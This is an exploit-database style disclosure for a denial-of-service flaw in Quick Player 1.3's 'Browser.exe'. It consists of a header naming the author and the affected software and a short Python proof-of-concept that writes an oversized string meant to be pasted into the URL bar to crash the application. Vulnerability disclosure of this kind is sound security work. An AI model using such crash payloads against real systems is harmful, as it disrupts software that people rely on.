Quick Player version 1.3 suffers from a denial of service vulnerability.
40cf6545b04e1c24d68ca9ceae3a6b4f
# Exploit Title: Quick Player 1.3 - 'Browser.exe' Denial of Service
# Date: 06/05/2020
# Author: Felipe Winsnes
# Software Link: http://download.cnet.com/Quick-Player/3640-2168_4-10871418.html
# Version: 1.3
# Tested on: Windows 7
# Proof of Concept:
# 1.- Run the python script "poc.py", it will create a new file "poc.txt"
# 2.- Open the application "Browser.exe"
# 3.- Paste the contents of "poc.txt" within the url bar
# 4.- Crashed
# Blog where the vulnerability is discussed: https://whitecr0wz.github.io/posts/Quick-Player-Browser-dos/
# Direct proof of the vulnerability: https://whitecr0wz.github.io/assets/img/Findings7/2.gif
buffer = "A" * 500000
f = open ("poc.txt", "w")
f.write(buffer)
f.close()